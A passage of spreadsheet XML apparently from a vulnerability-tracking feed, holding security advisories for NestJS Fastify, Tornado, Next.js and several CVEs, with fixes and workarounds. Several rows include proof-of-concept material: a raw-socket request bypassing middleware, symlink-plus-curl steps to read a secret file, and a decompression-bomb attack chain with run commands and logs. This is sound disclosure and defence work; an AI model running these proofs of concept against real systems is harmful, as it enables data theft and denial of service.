is dispatched normally. Two places on the middleware side matched against the **raw** request target instead:
1. The bundled copy of the `@fastify/middie` engine at `packages/platform-fastify/adapters/middie/fastify-middie.ts`.
   NestJS carried this fork to apply an earlier path-decoding fix and it did not track the upstream absolute-form fix
   released in `@fastify/middie@9.3.4`.
2. `FastifyAdapter`'s own re-check in `createMiddlewareFactory()`, which tests the middleware path regexp against
   `req.originalUrl`.
Both normalized and percent-decoded the target, but neither resolved absolute-form to a path, so the router and the
middleware layer disagreed about which path was being requested.
A second, related defect contributed. Because the adapter always passes `routerOptions` (to install the version
constraint), Fastify did not reflect the deprecated **top-level** router options (`ignoreTrailingSlash`,
`ignoreDuplicateSlashes`, `caseSensitive`, `useSemicolonDelimiter`) in `initialConfig.routerOptions`, which is what
the middleware engine reads. Applications passing those options at the top level had middleware normalize paths
differently from the router, which widened the mismatch.
### Proof of concept
```ts
@Controller('users')
export class UsersController {
  @Get()
  findAll() {
    return 'protected data';
  }
}
@Module({ controllers: [UsersController] })
export class AppModule implements NestModule {
  configure(consumer: MiddlewareConsumer) {
    consumer
      .apply((req, res) =&gt; res.end('blocked by auth middleware'))
      .forRoutes({ path: 'users', method: RequestMethod.GET });
  }
}
```
`supertest` and `light-my-request` always emit origin-form targets, so the request has to be written to the socket:
```js
const { connect } = require('node:net');
const socket = connect(3000, '127.0.0.1', () =&gt; {
  socket.write(
    'GET http://127.0.0.1:3000/users HTTP/1.1\r\n' +
      'Host: 127.0.0.1:3000\r\n' +
      'Connection: close\r\n\r\n',
  );
});
socket.pipe(process.stdout);
```
Observed on an affected version: `protected data` — the middleware did not run.
Expected, and observed on a patched version: `blocked by auth middleware`.
### Patches
Fixed in **12.0.2** and **11.2.4**. Upgrading to **12.0.3** or **11.2.5** is recommended.
- The bundled `@fastify/middie` fork was removed and the package now depends on `@fastify/middie@9.3.4`, which
  resolves absolute-form targets before matching.
- The adapter resolves absolute-form targets in its own route check, mirroring `find-my-way`.
- Deprecated top-level Fastify router options are folded into `routerOptions` so the middleware engine and the
  router normalize paths identically.
### Workarounds
If you cannot upgrade, reject non-origin-form request targets before middleware runs. Register the hook on the
Fastify instance **before the application is initialized**, so that it runs ahead of the middleware engine's own
`onRequest` hook, and confirm with the request above that the rejection takes effect:
```ts
const adapter = new FastifyAdapter();
adapter.getInstance().addHook('onRequest', (request, reply, done) =&gt; {
  const target = request.raw.url ?? '';
  // "*" is the legitimate request target of "OPTIONS * HTTP/1.1"
  if (target[0] !== '/' &amp;&amp; target !== '*') {
    reply.code(400).send();
    return;
  }
  done();
});
```
Rejecting or normalizing absolute-form targets at a reverse proxy in front of the application is equally effective.
### Credit
Reported by ZeroVuln Labs.</t>
        </is>
      </c>
      <c r="T366" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-9c5c-9qcx-q35q</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>GHSA-c2m8-h5v5-343r</t>
        </is>
      </c>
      <c r="D367" s="5" t="inlineStr"/>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="inlineStr"/>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K367" s="5" t="inlineStr"/>
      <c r="L367" s="5" t="inlineStr">
        <is>
          <t>PyPI:tornado</t>
        </is>
      </c>
      <c r="M367" s="5" t="inlineStr">
        <is>
          <t>6.5.9</t>
        </is>
      </c>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q367" s="5" t="inlineStr"/>
      <c r="R367" s="5" t="inlineStr"/>
      <c r="S367" s="5" t="inlineStr">
        <is>
          <t>### Summary
StaticFileHandler allows an unauthenticated attacker to read arbitrary files from the server's filesystem by requesting a path that resolves to a symbolic link placed inside the static root directory. Any application that serves user-uploadable content, or whose static directory is populated by a build/deploy pipeline that creates symlinks (e.g. npm link, webpack, Docker volume mounts, CDN sync tools), is affected. An attacker who can trigger the creation of a symlink pointing outside the static root—or exploit one that already exists—can retrieve sensitive files such as /etc/passwd, private keys, configuration files, or application secrets.
### Details
The vulnerability is in tornado.web.StaticFileHandler, specifically in the interaction between two methods in [tornado/web.py](vscode-webview://1grdaaa6v64itrol06qu70pq3d1b9h9im5c3npvvc9snaprc1q9f/tornado/web.py):
- [get_absolute_path](https://github.com/tornadoweb/tornado/blob/0ca3c5f8279d402b245718d16522bc18a8f5d958/tornado/web.py#L2932) uses `os.path.abspath()` to resolve the requested path:
- [validate_absolute_path](https://github.com/tornadoweb/tornado/blob/0ca3c5f8279d402b245718d16522bc18a8f5d958/tornado/web.py#L2935) uses the same `os.path.abspath()` on the root, then performs a string prefix check:
`os.path.abspath()` normalises . and .. segments but does not resolve symbolic links. As a result, a path like `/var/www/static/link` passes the `startswith("/var/www/static/")` check regardless of where `link` actually points.
Immediately after, `os.path.exists()` and `os.path.isfile()`  **do follow symlinks**, so the file they ultimately open is the symlink's target. The fix would be to replace os.path.abspath() with os.path.realpath() in both methods, so the resolved real path of the symlink target is validated against the root, not just its string representation inside the static directory.
### PoC
_Complete instructions, including specific configuration details, to reproduce the vulnerability._
Prerequisites: Python 3.x, Tornado installed.
1. Create the environment
```
mkdir -p /tmp/static
echo "DB_PASSWORD=s3cr3t" &gt; /tmp/secret.conf   
ln -s /tmp/secret.conf /tmp/static/config.conf 
```
2. Minimal vulnerable server (server.py):
```
import tornado.web, tornado.ioloop
app = tornado.web.Application([
    (r"/static/(.*)", tornado.web.StaticFileHandler, {"path": "/tmp/static"}),
])
app.listen(8888)
tornado.ioloop.IOLoop.current().start()
```
3. Exploit:
`curl http://localhost:8888/static/config.conf`
### Impact
Any application using StaticFileHandler is potentially affected if:
- the static directory contains symlinks pointing outside it (common with build tooling), or
- the application allows file uploads into the static directory without stripping symlinks.
An unauthenticated remote attacker can read any file readable by the process user: application secrets, private TLS keys, database credentials, /etc/shadow, SSH keys, or source code (depending on the process's filesystem permissions).</t>
        </is>
      </c>
      <c r="T367" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-c2m8-h5v5-343r</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>GHSA-chx6-46f5-w4vp</t>
        </is>
      </c>
      <c r="D368" s="5" t="inlineStr"/>
      <c r="E368" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F368" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="inlineStr"/>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K368" s="5" t="inlineStr"/>
      <c r="L368" s="5" t="inlineStr">
        <is>
          <t>PyPI:tornado</t>
        </is>
      </c>
      <c r="M368" s="5" t="inlineStr">
        <is>
          <t>6.5.9</t>
        </is>
      </c>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q368" s="5" t="inlineStr"/>
      <c r="R368" s="5" t="inlineStr"/>
      <c r="S368" s="5" t="inlineStr">
        <is>
          <t>An unbounded memory accumulation (decompression bomb) in `tornado.curl_httpclient.CurlAsyncHTTPClient` — the client-side sibling gap of CVE-2026-49855 — verified end-to-end on the 2026-08-15 master snapshot (`6.6.dev1`) and present unchanged in the latest release tag `v6.5.8` and on master (checked 2026-08-17). When a Tornado application configures the curl client (the documented deployment for proxy support / advanced TLS options) and `fetch()`es an attacker-chosen or attacker-compromised URL with default `decompress_response=True`, a malicious server replying `Content-Encoding: gzip` with a ~2.8 MB wire bomb drove the client's RSS from 30,884 kB to **1,032,100 kB (~1008 MB) in 3.18 s** (~350 MB/s, monotonic, no plateau) until the kernel OOM-killed the process (exit 137, cgroup `OOMKilled=true`) — with the transfer only 67% complete and **no client-side size check ever intervening**: `curl_httpclient.py` contains zero occurrences of `max_body_size`/`MAXFILESIZE`. The identical bomb against the default `SimpleAsyncHTTPClient` fails cleanly at ~65 MB, because every size gate CVE-2026-49855 added (compressed CL, chunked total, cumulative decompressed size — `http1connection.py:620,676,742`) lives in code the curl client never executes. This is a distinct component from the published advisory (which fixed `_GzipMessageDelegate`/`SimpleAsyncHTTPClient` only) and from the other curl-client advisories (credential handle-reuse GHSA-pw6j-qg29-8w7f, header CRLF GHSA-w235-7p84-xx57); the file's full commit history (latest 2026-06-17) shows no response-size work.
## Details
`tornado/curl_httpclient.py` (line numbers identical on master `6.6.dev1`, `v6.5.8`, and the audited snapshot):
```python
"buffer": BytesIO(),                                  # :202 — plain BytesIO, no accounting
...
else:
    write_function = buffer.write                     # :359 — every decompressed byte lands here
curl.setopt(pycurl.WRITEFUNCTION, write_function)     # :360
...
if request.decompress_response:                       # default True (HTTPRequest)
    curl.setopt(pycurl.ENCODING, "gzip,deflate")      # :373-374 — libcurl advertises + auto-decodes
```
libcurl decompresses the response **before** invoking `WRITEFUNCTION`, so the callback receives decompressed bytes, which are appended to an unbounded `BytesIO` until the transfer ends or the process dies. The only ceiling is `request_timeout` (default 20 s) — at zlib's hundreds of MB/s that still permits many GB of accumulation; the PoC raised it to 300 s and the 1 GiB cgroup cap was hit in 3.2 s regardless. There is no `pycurl.MAXFILESIZE`, no `max_buffer_size`/`max_body_size` plumbing (the constructor accepts no body-size option), and `streaming_callback` users fare no better (the callback variant at `:353-356` also performs zero accounting).
Contrast — `SimpleAsyncHTTPClient` path (`tornado/http1connection.py`), all absent from the curl path:
```python
if cast(int, content_length) &gt; self._max_body_size:        # :620  Content-Length gate
if total_size &gt; self._max_body_size:                       # :676  chunked total gate
if self._decompressed_body_size &gt; self._max_body_size:     # :742  CVE-2026-49855 decompressed gate
```
`SimpleAsyncHTTPClient.initialize()` defaults `max_buffer_size = 104857600` (100 MiB) with `max_body_size` defaulting to it (`simple_httpclient.py:117-121`); `CurlAsyncHTTPClient.initialize()` has no corresponding parameter at all.
Attack chain (attacker = malicious HTTP server; victim = any Tornado app doing `fetch()` on attacker-influenced URLs — URL fetchers, webhook processors, link previewers, RSS/probe pollers):
1. App configures `AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient")` (documented for proxy support; proxies are only supported with the curl client).
2. App calls `fetch("http://attacker/...")` with defaults → request advertises `Accept-Encoding: gzip,deflate`.
3. Attacker replies `200`, `Content-Encoding: gzip`, `Transfer-Encoding: chunked`, body = a gzip stream of zeros (4,174,525 wire bytes expanding to 4 GiB, 1029:1, sent in 64 KB chunks).
4. libcurl auto-decodes at ~350 MB/s into `buffer.write` with no size accounting → process RSS climbs linearly until OOM. The response need not complete: the client died with 2,818,048/4,174,525 wire bytes delivered (67%).
Variant without compression: `decompress_response=False` plus an endless streaming body (no Content-Length, no final chunk) feeds the same unaccounted `buffer.write` — this client never enforces any cap on any path.
## PoC
Verified end-to-end 2026-08-15 in a single container (cgroup `--memory 1g --memory-swap 1g` so the exhaustion endpoint is safe and fast to observe), two processes over a real TCP socket on `127.0.0.1:8081`: a raw-socket malicious server (`evil_server.py`, builds the 4 GiB-of-zeros gzip bomb once, serves it with chunked framing) and the Tornado victim (`victim_curl.py`, configures `CurlAsyncHTTPClient`, `fetch(..., request_timeout=300)`, samples `/proc/self/status` VmRSS every 0.2 s from a monitor thread so the curve survives the OOM kill).
### Build &amp; run the victim
```bash
git clone https://github.com/tornadoweb/tornado
cd tornado
pip install pycurl
python evil_server.py &amp;     # 127.0.0.1:8081; prints BOMB_BUILT wire_bytes=... ratio=... EVIL_LISTENING
python victim_curl.py       # victim: CurlAsyncHTTPClient fetch -&gt; expect linear RSS rise -&gt; OOM
python victim_simple.py     # control: default SimpleAsyncHTTPClient on the same bomb
```
Verified environment: debian:bookworm-slim, Python 3.11.2, python3-pycurl 7.45.2 (libcurl 7.88.1, zlib 1.2.13), tornado master snapshot `6.6.dev1` of 2026-08-15 run from the source tree (`sys.path`), container memory capped at 1 GiB. `curl_httpclient.py` verified byte-equivalent (still zero size-limit references) in tag `v6.5.8` and on master as of 2026-08-17.
### Reproduction steps
1. **Precondition — the documented curl-client deployment fetching a remote URL.** The vulnerability requires the application to use `CurlAsyncHTTPClient` (the standard configuration when proxy support or advanced TLS options are needed) with default `decompress_response=True`, and to fetch a URL whose server the attacker controls or has compromised. `victim_curl.py` implements exactly that (`AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient")` → `fetch()`), and the server log confirms the ENCODING path engaged — the victim's request arrived with `User-Agent: Mozilla/5.0 (compatible; pycurl)` and `Accept-Encoding: gzip,deflate`.
2. **Attack:** start `evil_server.py`, wait for `EVIL_LISTENING`, then run `victim_curl.py` (the fetch itself is the attack; no further interaction).
3. **Expected:** `victim_curl_rss.log` shows VmRSS 30,884 → 1,032,100 kB over 3.18 s, rising ~350 MB/s with no plateau; the container kills the victim (`exit 137`, docker `OOMKilled=true`); the server logs `CLIENT_DIED_MID_TRANSFER wire_sent=2818048/4174525` — the accumulation is bounded only by available memory, never by a client-side check, and the 4 GiB payload was never fully delivered.
4. **Variant:** with `decompress_response=False` and an unterminated chunked body (server keeps sending forever), the same `buffer.write` path accumulates unbounded plain bytes — no compression needed; `request_timeout` only extends the ceiling.
5. **Control:** `victim_simple.py` fetches the identical bomb with the default `SimpleAsyncHTTPClient` → clean `FETCH_FAILED: HTTP 599: Connection closed`, RSS peak ~65 MB (24,984 → 66,712 kB), script exit 0 — the CVE-2026-49855 accounting in `http1connection.py` aborts the transfer, proving the gap is specific to the curl client.
### PoC source
Full PoC source (**victim_curl.py**, stdlib only, no dependencies): [victim_curl.py](https://gist.github.com/afldl/211c0e7af8175c2eabab53ed037c435d) (secret gist, unlisted).
The gist carries `evil_server.py` (bomb server), `victim_curl.py` (victim), `victim_simple.py` (control), and `REPRODUCE.md`.
### Captured output (2026-08-15 run, verbatim excerpts)
```
evil_server.log:
BOMB_BUILT wire_bytes=4174525 decompressed_bytes=4294967296 ratio=1029:1
EVIL_LISTENING 127.0.0.1:8081
REQUEST_FROM 127.0.0.1:57544 -&gt; GET /bomb HTTP/1.1
REQUEST_HEADERS:
GET /bomb HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (compatible; pycurl)
Accept: */*
Accept-Encoding: gzip,deflate
WIRE_SENT 65536/4174525
WIRE_SENT 2162688/4174525
CLIENT_DIED_MID_TRANSFER wire_sent=2818048/4174525 err=ConnectionResetError(104, 'Connection reset by peer')
victim_curl_rss.log (VmRSS kB, every 0.2 s):
0.00  30884
0.61  231848
1.41  514720
2.22  794480
2.82 1000756
3.18 1032100        &lt;- last sample before kill
driver_f1.log:
timeout 240 python3 /e2e/F1/victim_curl.py ...  606 Killed
VICTIM_CURL_EXIT=137         # docker inspect -&gt; OomKilled: true
victim_simple.log (control, same bomb):
FETCH_FAILED: HTTP 599: Connection closed
SCRIPT_FINISHED_NORMALLY     # exit 0, VmRSS peak 66712 kB
```
Honest framing of the endpoint: the OOM kill at ~1008 MB was forced by the test's 1 GiB cgroup cap as the observation instrument; the "unbounded" claim rests on the linear no-plateau RSS curve, death at 67% wire delivery, and the absence of any size accounting in the code path — with more memory the transfer would have continued to the full 4 GiB payload.
## Impact
Denial of service (memory exhaustion) of any Tornado application that uses the curl HTTP client and fetches attacker-influenced URLs. A single ~4 MB response kills a 1 GiB process in ~3 s; wire cost scales as `available_memory / 1000`. Because the accumulation happens on the shared event loop's client, one malicious response takes down the entire application (all concurrently served users), and a slow endless-body variant drains memory gradually below detection thresholds. The attack requires no privileges, no user interaction, and only that the victim's configured client visits the attacker's origin.
### Suggested fix
Enforce a byte budget in the write path of `CurlAsyncHTTPClient`: wrap the `WRITEFUNCTION` (both the `buffer.write` branch and the `streaming_callback` branch) in a counter that aborts the transfer (`curl.setopt(pycurl.FAILONERROR)`-style cancellation or raising from the callback) once the received total exceeds `max_body_size`, plumbed from `initialize()` with the same 100 MiB default as `SimpleAsyncHTTPClient`. Because libcurl decompresses before the write callback, the counter naturally measures *decompressed* bytes — the same semantics as the CVE-2026-49855 fix. (`pycurl.MAXFILESIZE` alone is insufficient: it applies to the compressed transfer size.)
### Affected versions
- **&lt;= 6.5.8** (latest tag; the curl client has never had a response-size limit) and master (`6.6.dev1`, verified 2026-08-15/17).
- 6.5.6's CVE-2026-49855 fix covered `SimpleAsyncHTTPClient`/`http1connection.py` only; `curl_httpclient.py` was not touched.
## Credit
Reported by the diff/ambidiff security research effort (afldl).</t>
        </is>
      </c>
      <c r="T368" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-chx6-46f5-w4vp</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>GHSA-vcvr-r3jv-pc5j</t>
        </is>
      </c>
      <c r="D369" s="5" t="inlineStr"/>
      <c r="E369" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F369" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="inlineStr"/>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K369" s="5" t="inlineStr"/>
      <c r="L369" s="5" t="inlineStr">
        <is>
          <t>npm:next</t>
        </is>
      </c>
      <c r="M369" s="5" t="inlineStr">
        <is>
          <t>16.3.6</t>
        </is>
      </c>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q369" s="5" t="inlineStr"/>
      <c r="R369" s="5" t="inlineStr"/>
      <c r="S369" s="5" t="inlineStr">
        <is>
          <t>## Impact
The Node.js `ImageResponse` implementation from `next/og` is affected by an upstream vulnerability. This can lead to remote code execution.
Affected applications pass attacker-controlled values into SVG content, attributes, or styles during image generation:
```tsx
import { ImageResponse } from 'next/og'
export async function GET(request: Request) {
  const value = new URL(request.url).searchParams.get('value') ?? ''
  return new ImageResponse(
    &lt;svg width="1200" height="630"&gt;
      &lt;title&gt;{value}&lt;/title&gt;
    &lt;/svg&gt;
  )
}
```
Applications using the Edge `ImageResponse` implementation, or applications that do not pass attacker-controlled values into SVG content, attributes, or styles, are not affected.
## Workaround
If upgrading is not immediately possible, do not pass attacker-controlled values into SVG content, attributes, or styles rendered by the Node.js `ImageResponse` implementation from `next/og`.</t>
        </is>
      </c>
      <c r="T369" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-vcvr-r3jv-pc5j</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94952</t>
        </is>
      </c>
      <c r="D370" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E370" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F370" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="inlineStr"/>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr"/>
      <c r="K370" s="5" t="inlineStr"/>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q370" s="5" t="inlineStr"/>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S370" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability exists in the web management interface of TOTOLINK N150RT (NTR150) firmware V3.4.0-B20201030. It is reachable through the route /boafrm/formPortFw (port-forwarding configuration handler) and is triggered by the ip_subnet and fw_ip request parameters during the rule-addition flow.</t>
        </is>
      </c>
      <c r="T370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94952</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100758</t>
        </is>
      </c>
      <c r="D371" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E371" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F371" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="inlineStr"/>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr"/>
      <c r="K371" s="5" t="inlineStr"/>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q371" s="5" t="inlineStr"/>
      <c r="R371" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S371" s="5" t="inlineStr">
        <is>
          <t>Sandbox escape in the DOM: Navigation component. This vulnerability was fixed in Firefox ESR 153.4, Thunderbird 157, Thunderbird 140.17, Thunderbird 153.4, Firefox 157, Firefox ESR 115.42, and Firefox ESR 140.17.</t>
        </is>
      </c>
      <c r="T371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100758</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.0 → 9.4)</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103056</t>
        </is>
      </c>
      <c r="D372" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E372" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F372" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="inlineStr"/>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr">
        <is>
          <t>crowdstrike</t>
        </is>
      </c>
      <c r="K372" s="5" t="inlineStr"/>
      <c r="L372" s="5" t="inlineStr"/>
      <c r="M372" s="5" t="inlineStr"/>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q372" s="5" t="inlineStr"/>
      <c r="R372" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S372"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372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103056</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.8 → 9.3)</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54400</t>
        </is>
      </c>
      <c r="D373" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E373" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F373" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="inlineStr"/>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr"/>
      <c r="K373" s="5" t="inlineStr"/>
      <c r="L373" s="5" t="inlineStr"/>
      <c r="M373" s="5" t="inlineStr"/>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q373" s="5" t="inlineStr"/>
      <c r="R373" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S373" s="5" t="inlineStr">
        <is>
          <t>Fumasoft Fumeng Cloud contains a SQL injection vulnerability in the AjaxMethod.ashx endpoint that allows unauthenticated remote attackers to inject arbitrary SQL through the Name parameter of the getEmpByname action without any authentication. Attackers can exploit UNION-based SQL injection techniques against the Microsoft SQL Server backend to extract, disclose, and modify database contents, with potential for further compromise of the underlying server. Exploitation evidence was first observed by the Shadowserver Foundation on 2023-10-18.</t>
        </is>
      </c>
      <c r="T373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54400</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.8 → 9.3)</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103040</t>
        </is>
      </c>
      <c r="D374" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E374" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F374" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="inlineStr"/>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr"/>
      <c r="K374" s="5" t="inlineStr"/>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q374" s="5" t="inlineStr"/>
      <c r="R374" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S374" s="5" t="inlineStr">
        <is>
          <t>LightLLM through 1.2.0 contains a remote code execution vulnerability in the router profiler service when started with --enable_profiling flag. The service exposes an unauthenticated RPyC server with pickle deserialization enabled, allowing attackers to execute arbitrary code by sending crafted serialized objects to the profiler command queue.</t>
        </is>
      </c>
      <c r="T374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103040</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.8 → 9.3)</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103041</t>
        </is>
      </c>
      <c r="D375" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
